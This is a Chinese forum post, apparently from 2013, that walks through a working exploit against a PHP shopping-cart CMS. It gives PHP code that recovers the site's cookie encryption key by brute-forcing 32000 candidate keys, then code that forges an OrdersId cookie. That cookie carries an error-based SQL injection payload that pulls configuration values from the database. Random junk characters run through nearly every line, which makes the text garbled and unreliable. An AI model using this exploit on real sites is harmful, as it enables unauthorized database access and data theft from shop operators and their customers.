www.xxx.com/plus/search.php?keyword=
+ Z7 m7 R' T3 L* h在 include/shopcar.class.php中
+ X. B$ D; @3 i3 y. d7 F9 r, ^) s先看一下这个shopcar类是如何生成cookie的
, ~4 ?2 P8 Z ]) I4 k2 Q2 ~. j239 function saveCookie($key,$value)
, L; |3 q, t1 b# A2 W240 { r0 Q: Q' a( n; |; F9 ~1 W: {
241 if(is_array($value))
d- @9 @2 N" a& ~! f! s242 {$ z/ H3 a9 p2 V+ d2 v: O
243 $value = $this->enCrypt($this->enCode($value));
8 j; f' c$ h- j" r; M244 }1 a5 ~2 w% ~$ r9 x8 G
245 else- D9 z/ D: g5 w0 {
246 {, M& R% j* R; F' e C( w$ P
247 $value = $this->enCrypt($value);( g8 o. O4 q0 M9 N
248 }3 y% s1 R4 g; o2 _6 M. ^9 u
249 setcookie($key,$value,time()+36000,’/');# g; a+ b x4 ?( e) T6 R
250 }. q, w ?1 o( I1 I* |: \8 @
简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
0 N/ J) a- t& \0 V& _5 H# e186 function enCrypt($txt)
0 O1 q. A1 f' {3 J- A2 I+ n" s187 {& O* \: j& H4 |: K! i5 R0 f! P. f+ E
188 srand((double)microtime() * 1000000);) p0 r. _0 N( }: Q3 p8 y/ y- E
189 $encrypt_key = md5(rand(0, 32000));/ r1 J( z3 F! T+ ~) ` c) Q$ i4 h: \
190 $ctr = 0;4 j' M+ ~2 I, U* Z0 m3 q* V& v
191 $tmp = ”;
' D. }+ d- ]% x8 X0 w: C" C1 U& Z192 for($i = 0; $i < strlen($txt); $i++)4 j1 l0 q$ I0 W3 Y/ v2 O) }
193 {6 X3 U# E$ N! r
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
# \5 {+ }) \! ]- g6 c195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);* p4 j& r1 M1 Y7 o
196 }
; e1 c7 u e! Y# g$ B4 x; f3 D/ P5 v197 return base64_encode($this->setKey($tmp));1 d$ s) `2 U7 `. j9 C: C
198 }
A0 p- S* A5 `213 function setKey($txt)! i- w2 X2 y) Z% _5 P) ]
214 {
( D* f' Y' J8 f5 [0 }# N6 r; t215 global $cfg_cookie_encode;: D) c' s4 _: I; r, W' [9 w
216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
8 p: f" T( K. Z% {1 ^4 K4 j+ S217 $ctr = 0;
/ D8 z2 j! y' b. T: b" i218 $tmp = ”;
" j8 p# r0 Q7 Q3 D2 g* S219 for($i = 0; $i < strlen($txt); $i++)2 E( q3 }" a' F
220 {
) h6 h; D! f7 E8 ]9 Y4 _221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
% N( f6 t Z4 v, p$ Z222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
: v% O1 ~1 ? w5 q9 U3 \223 }
! c6 i& k, n/ C2 n! W2 {8 j! g224 return $tmp;" Y3 s* g* w& J1 K( _5 R2 }6 x
225 }
. I8 X9 I6 }" \6 {$ x& E& x, C- ?enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
9 Q. {" I P/ E) w然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
9 u: U. _3 @; v: I0 s: i具体代码如下:7 Z1 R% B7 ]9 V% D% [5 ]: M6 Y
<?php
! l6 }+ d( i; ?$ s$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here+ d% {9 l; w/ ?. s6 C! Q
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
- z6 q/ y: M! J4 S" ]1 d$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
9 v0 T4 O8 @1 S. \2 V4 I8 Zfunction reStrCode($code,$string)3 `' `- M/ E4 D3 K4 P# I
{- u, k7 v6 C5 |8 o0 m g$ ?( u2 h5 Y
$code = base64_decode($code);' o: O/ z3 o$ U2 `' `
$key = “”;8 \8 T: G- ^9 |% I0 B8 ]
for($i=0 ; $i<32 ; $i++)4 u4 U6 ?+ K8 y$ M" T1 u7 F, z
{
( B+ R" [, _& ^+ h$key .= $string[$i] ^ $code[$i];# Y2 M7 ?7 c' Q
}
. G6 _( i7 Z4 J' d% R5 f areturn $key;
' \2 m$ N! m* Q. p, X2 h}
: L8 Y+ a/ r4 R5 T, s) [. ~8 ^function getKeys($cookie,$plantxt); o: D: k1 s' [. M& Z
{7 c. l$ X2 v! Q o% n* l
$tmp = $cookie;
' }" n, j5 c& P( b$results = array();
; }8 l2 {( O& ~ bfor($j=0 ; $j < 32000; $j++)% U/ |0 P8 ^9 T7 F$ Q* I
{: g" F' j; A x5 E
2 r6 D4 E7 U/ E' L1 y: O0 Q( ]
$txt = $plantxt;
( k& I% g7 \' O, J! Y$ctr = 0;
# a6 _) R$ t6 ~$tmp = ”;
, o" `' N' h, e+ C9 N5 Y& M9 k& l( V$encrypt_key = md5($j);1 G7 J* h1 Q2 ?, ` o# t) A
for($i =0; $i < strlen($txt); $i ++)
1 J7 @% K5 h- K* X/ [9 o{" p. L; ^% O$ @
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
+ @) d: F- t& e1 e: p$ ] j$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
9 K. Y3 s4 p) ~/ l" s}* R. V1 e) l+ G$ E0 M+ g" q0 l$ m, @5 V
$string = $tmp;3 m6 U4 V3 O. [. D I
$code = $cookie;
/ U" C! V/ `/ y7 Y! h% [ s3 @% G$result = reStrCode($code,$string);
' j y' a- m" Y7 k2 k; ^' n) ~if(eregi(‘^[a-z0-9]+$’,$result))
v V# e1 f. e' o1 i9 q{3 \0 J" Q8 z; v& V) @% b
echo $result.”\n”;$ N7 M1 w \. G" z, z$ ?
$results[] = $result;6 Z! j* M( \( @
}9 k' b. T0 o* s; v4 ~
}
$ T1 Q" o* a8 r0 G* `( greturn $results;
( a) A0 d& ?& S: ~; I1 E8 A}. t, _1 U# `- \( ~2 O
$results1 = getKeys($cookie1,$plantxt);
8 a7 B X; n) t6 ^$results2 = getKeys($cookie2,$plantxt);& C+ U; j7 \4 e# e) v" w4 p" G
print “\n——————–real key————————–\n”;
2 ~& p5 w5 a. v2 I5 dforeach($results1 as $test1) [* E& q: r- Y) H
{& q7 ]1 X( V) ^- v, T& X
foreach($results2 as $test2)
. g' U5 S9 r6 O. v{( o- | L) |7 O. I; \
if($test1 == $test2)
( |- L5 Z9 Z# S{& x$ R0 T6 H; O' E7 G
echo $test1.”\n”;
( m7 } I4 [* ~" P/ u' B$ Q9 Q}
+ K y! |7 ~! y5 o( J}
! G4 z9 K" V: m. Y) z}
) O: s& H- ^# y4 z?>
" o1 n$ @1 V. j j: s2 ^3 d tcookie1 和 cookie2 是我下了两次订单后分别生成的cookie,# f- T0 q( o! W: V0 M/ o
plantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
3 j/ X5 O" Y/ n2 Q9 `然后推算出md5(strtolower($cfg_cookie_encode))
$ {1 `4 Z- F6 }2 h6 q p; l得到这个key之后,我们就可以构造任意购物车的cookie" M: |$ o+ N8 Q, q$ x
接着看
x+ |5 M6 ?, R' I2 ~- z% r20 class MemberShops* N; k; X+ x- y/ u: N* Z, n
21 {
, r: V p' T8 X! @1 f22 var $OrdersId;
+ T# O% N% N+ I& v, Y, y( k6 s. t23 var $productsId;
3 h1 V) U- q$ `0 C# c24
7 g& d, q+ \6 J25 function __construct()
! {# r6 \% ]1 R5 G, B% N3 {26 {
+ {1 E/ }) M: ~5 Z27 $this->OrdersId = $this->getCookie(“OrdersId”);, p9 G; }. V5 U4 |+ M
28 if(empty($this->OrdersId))
$ x$ `) j; K6 |# J29 {0 h4 I. D$ N' Z* z j
30 $this->OrdersId = $this->MakeOrders();
$ p6 `/ l& |' R- _ _8 X9 o31 }" Y9 o) _ E$ Z9 v9 c- e
32 }
6 @3 k1 F+ a/ ~9 ~ g! U发现OrderId是从cookie里面获取的
6 x: {- X; `3 G7 M然后
7 D% }% j+ ^: `$ M+ j/plus/carbuyaction.php中的
5 E0 K: c' i+ k" T3 f. i4 F; a29 $cart = new MemberShops();
( n" ?6 f) l- t3 C2 ~1 L3 b39 $OrdersId = $cart->OrdersId; //本次记录的订单号
0 Z: q( o5 e) X" y6 q9 V……
8 F, Y7 |1 a% `0 z. l8 a173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);3 c; { q: H2 P; Y' K; a
接着我们就可以注入了
" A! S4 Q' J" u3 ~' c( Q通过利用下面代码生成cookie:
. O" J! @; J% L t. @* P<?php
8 M9 b5 d- a, B9 r$ E& n$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;0 E$ X+ j2 j& {: ~6 [9 I% p
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
" ~, X) b( y3 e* ]function setKey($txt)
& }; x: s( D- [7 P{
* n' v) v: k% {+ Sglobal $encrypt_key;5 Q6 [* b; P! R, d& f
$ctr = 0;% i; G- R( i# F
$tmp = ”;
. F6 C, |$ Q( h' Ifor($i = 0; $i < strlen($txt); $i++)0 d2 ^) J3 _6 Y
{" Y5 ^3 T8 }+ ] A; V2 L4 x
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;* H8 W. L j. x+ S- y! b( {1 W* G
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];* _4 B8 S$ m. A2 i7 ], `5 w8 x3 M5 a% E
}# P" Y7 g( u5 D9 n# W: F: X& v( J4 ]
return $tmp;4 O& H* Z" v/ G
}
5 `; [' x6 }& C, U- f) @% ofunction enCrypt($txt)
6 R6 \& L' z4 k% p! K4 L8 P* H{
9 p8 h5 B, z+ S' B2 |$ Q* v9 h! Csrand((double)microtime() * 1000000);; [! M$ }! L/ I1 p
$encrypt_key = md5(rand(0, 32000));
( @3 q, N/ `0 V7 t/ L4 e: {$ctr = 0;3 X% N) i7 G! k: w/ R4 s9 e' K2 d; G
$tmp = ”;# _2 I4 r- k3 |* E' z
for($i = 0; $i < strlen($txt); $i++)& X) G& K E: m& g
{( n' L6 i0 [6 `& q
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;9 p( R+ ?+ l/ j4 R
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);* B! ]( `; }1 h4 p& } ^- {
}
$ u6 B% f- f8 x$ l" Kreturn base64_encode(setKey($tmp));
) G5 B4 Q$ ?) a3 K. v; M- h8 g' a}
, y9 w0 L* c6 B" M( B8 D+ ?for($dest =0;$dest = enCrypt($txt);)* R% ?$ U5 w4 n3 f% R2 R
{4 U e, r7 I1 R1 J
if(!strpos($dest,’+'))9 r/ x3 E* t5 O
{
9 W. [4 x2 R) q x9 `; wbreak;1 P+ R+ p& B# q% R5 U7 ]3 Z0 r
}
9 R) P1 m, Q# B- c, o/ @}
8 X* E7 y) L. H3 Kecho $dest.”\n”;, Z5 k$ e8 X1 R* u+ g
?>
/ J" t) c( z6 Z; d# ?( t
) z1 S5 @0 h7 m2 r$ Q* I1 I( d |
发表于 2013-2-13 23:58:29
收藏
支持
反对